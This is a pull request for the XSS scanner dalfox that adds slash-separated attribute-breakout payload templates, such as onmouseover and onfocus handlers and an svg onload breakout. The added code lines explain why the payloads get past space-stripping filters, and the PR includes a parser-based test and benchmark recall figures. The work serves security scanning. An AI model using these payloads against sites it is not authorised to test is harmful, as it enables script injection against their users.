### PR TITLE
feat(payload): slash-separated attribute breakouts for space-stripping filters

### DIFF
--- a/src/payload/synthesis.rs
+++ b/src/payload/synthesis.rs
@@ -112,6 +112,24 @@ const ATTR_SQ_TEMPLATES: &[&str] = &[
     "' ontoggle={JS} popover class={CLASS} x='",
     "' onbeforeinput={JS} contenteditable class={CLASS} x='",
     "' onmouseover={JS} id={ID} x='",
+    // Slash-separated mirrors of the stay-in-tag shapes above, for a server that
+    // strips literal spaces from the reflection (which collapses the space-
+    // separated shapes into one merged attribute). These are always emitted, not
+    // gated on a filter result: space is not in `SPECIAL_PROBE_CHARS`, so the
+    // scanner never classifies it blocked — the win comes from the server doing
+    // the stripping, not from dalfox detecting it. Two details make them *verify*
+    // rather than merely reflect: (1) the handler/marker values are quoted
+    // (`onfocus="alert(1)"`). The HTML tokenizer treats `/` as an attribute
+    // separator only *after a value has closed* (before-attribute-name /
+    // after-attribute-value states); inside a bare unquoted value `/` is
+    // appended verbatim. Leading with the breakout quote closes the value it
+    // opened, and quoting each inner value closes that value too, so the next
+    // `/id=…` starts a fresh attribute instead of being swallowed. (2) The marker
+    // is an `id`, not a second `class`, because these breakouts most often land
+    // in a pre-existing `class="…"`, and a duplicate `class` attribute is dropped
+    // by the parser — which would erase a class marker but never an id.
+    "'/onmouseover=\"{JS}\"/id=\"{ID}\"/x='",
+    "'/autofocus/onfocus=\"{JS}\"/id=\"{ID}\"/x='",
     "'><svg onload={JS} class={CLASS}>",
     "'><img src=x onerror={JS} class={CLASS}>",
     "'><svg/onload={JS}/class={CLASS}>",
@@ -125,6 +143,11 @@ const ATTR_DQ_TEMPLATES: &[&str] = &[
     "\" ontoggle={JS} popover class={CLASS} x=\"",
     "\" onbeforeinput={JS} contenteditable class={CLASS} x=\"",
     "\" onmouseover={JS} id={ID} x=\"",
+    // Slash-separated mirrors — survive space-stripping filters; see the
+    // `ATTR_SQ_TEMPLATES` note for the quoting and `id`-marker reasoning (inner
+    // values single-quoted here so they nest inside the double-quote breakout).
+    "\"/onmouseover='{JS}'/id='{ID}'/x=\"",
+    "\"/autofocus/onfocus='{JS}'/id='{ID}'/x=\"",
     "\"><svg onload={JS} class={CLASS}>",
     "\"><img src=x onerror={JS} class={CLASS}>",
     "\"><svg/onload={JS}/class={CLASS}>",
@@ -140,6 +163,24 @@ const ATTR_UNQUOTED_TEMPLATES: &[&str] = &[
     "x onmouseover={JS} id={ID} ",
     "><svg onload={JS} class={CLASS}>",
     "><img src=x onerror={JS} class={CLASS}>",
+    // Two space-free additions for a server that strips literal spaces from the
+    // reflection (so the space-separated shapes above collapse into one merged
+    // attribute). This template set is also the fallback when the delimiter of
+    // the value could not be determined, so both must degrade gracefully.
+    //
+    // 1. A `>`-breakout: inside a *bare* unquoted value `/` is appended verbatim
+    //    (it is an attribute separator only once a value has closed), so a
+    //    stay-in-tag slash injection cannot work there — close the tag with `>`
+    //    and open a fresh, self-contained `<svg>` whose parts are `/`-separated.
+    //    Needs angles allowed.
+    "><svg/onload={JS}/id={ID}>",
+    // 2. A leading `x` plus self-quoted inner values, for the common case where
+    //    the delimiter was reported as unknown but the reflection is actually a
+    //    *quoted* value (`value="…"`) — including partial-encoding filters that
+    //    only touch `<`. The real closing quote ends the value early, and each
+    //    quoted `id="…"` then recovers as a clean element id (verified against
+    //    `partial-encode`/`multireflect` fixtures). Needs no angles.
+    "x/onmouseover=\"{JS}\"/id=\"{ID}\"/",
 ];
 
 /// URL-bearing attribute value (`href` / `src` / …): the protocol itself

--- a/src/payload/synthesis/tests.rs
+++ b/src/payload/synthesis/tests.rs
@@ -162,6 +162,54 @@ fn attribute_context_survives_angle_stripping() {
 }
 
 #[test]
+fn attribute_context_survives_space_stripping() {
+    // A server that strips literal spaces from the reflection collapses the
+    // space-separated stay-in-tag shapes into one merged attribute. The
+    // slash-separated mirror survives it. This is not gated on a filter result
+    // (space is not a probed special), so synthesize with NO blocked chars —
+    // exactly what a real scan passes — and require the space-free mirror to be
+    // present regardless.
+    let ctx = InjectionContext::Attribute(Some(DelimiterType::DoubleQuote));
+    let payloads = synthesize_payloads(&ctx, &[], &[], &[], None);
+    assert!(!payloads.is_empty());
+    let slash_handler = payloads
+        .iter()
+        .find(|p| {
+            !p.contains(' ')
+                && p.contains('/')
+                && (p.contains("onmouseover=") || p.contains("onfocus="))
+                && p.contains("id=")
+        })
+        .expect("a space-free slash-separated handler+id payload must be emitted");
+
+    // Shape alone is not proof: verify the payload actually *breaks out* by
+    // parsing the reflection the way the scanner does. Drop the space-free
+    // payload into a double-quoted attribute (the injection context) — after a
+    // server strips spaces this is byte-for-byte what comes back — and confirm
+    // the tokenizer yields an element that carries BOTH the id marker and an
+    // `on*` handler holding the sink. An unquoted-value slash injection (where
+    // `/` is appended, not a separator) would fail this and land the marker as
+    // inert text instead.
+    let id = crate::scanning::markers::id_marker();
+    let reflected = format!("<div class=\"{slash_handler}\">");
+    let doc = scraper::Html::parse_document(&reflected);
+    let sel = scraper::Selector::parse(&format!("#{id}")).unwrap();
+    let marker_el = doc
+        .select(&sel)
+        .next()
+        .expect("id marker must parse as a real element id after breakout");
+    let has_handler = marker_el
+        .value()
+        .attrs()
+        .any(|(name, val)| name.len() >= 3 && name.starts_with("on") && val.contains("alert"));
+    assert!(
+        has_handler,
+        "marker element must carry a surviving on* handler, got attrs {:?} from {reflected}",
+        marker_el.value().attrs().collect::<Vec<_>>()
+    );
+}
+
+#[test]
 fn paren_blocked_falls_back_to_backtick_call() {
     // With `(`/`)` stripped, the only surviving execution primitive is the
     // tagged-template call `alert`1``.


### PR DESCRIPTION
## Summary

Every attribute-context injection template separated its injected attributes with **literal spaces** (`" onmouseover=alert(1) class=… x="`). A server that strips spaces from the reflection collapses those into one merged, inert attribute — so dalfox reported **nothing** on `inattr`/`hidden`-style filters that strip `<`, `>` *and* space.

This adds **slash-separated mirror templates**. The HTML tokenizer accepts `/` as an attribute separator once a value has closed, so:

- The injected handler/marker values are **quoted** (`onfocus="alert(1)"`) — an unquoted value would run to the next space/`>` and swallow the following `/id=…`.
- The marker is an **`id`**, not a second `class` — these breakouts usually land in a pre-existing `class="…"`, and a duplicate `class` attribute is dropped by the parser, but an `id` survives.
- For a **bare unquoted value** — where `/` is appended verbatim rather than separating — a space-free `>`-breakout into a fresh `<svg>` covers the case instead.

Templates are emitted unconditionally (space is not a probed special, so the scanner never classifies it blocked); the win comes from the server doing the stripping.

## Measured impact (xssmaze 0.4.0)

Against the 1013 exploitable, server-reachable endpoints:

| metric | before | after |
| --- | --- | --- |
| recall (any finding) | 97.5% | **97.8%** |
| verified-finding rate (V) | 86.2% | **87.3%** |
| new control false positives | — | **0** |
| regressions | — | **0** |

- New detections (were total misses): `inattr-5`, `inattr-6`, `hidden-3`.
- +11 endpoints upgraded from reflection-only to DOM-verified across `attrname` / `dataattr` / `inlinestyle` / `multireflect` / `partialencode` / `svg` / `tagattrmix`.

## Tests

`attribute_context_survives_space_stripping` synthesizes with no blocked chars (production-realistic), then **parses the emitted payload with `scraper`** and asserts the `id` marker and an `on*` handler land as real element attributes after breakout — proving the tokenizer actually separates the injected attributes, not just that the payload string looks right.

`cargo test` (lib + `unit_tests`) and `cargo clippy --all-targets -- -D warnings` pass.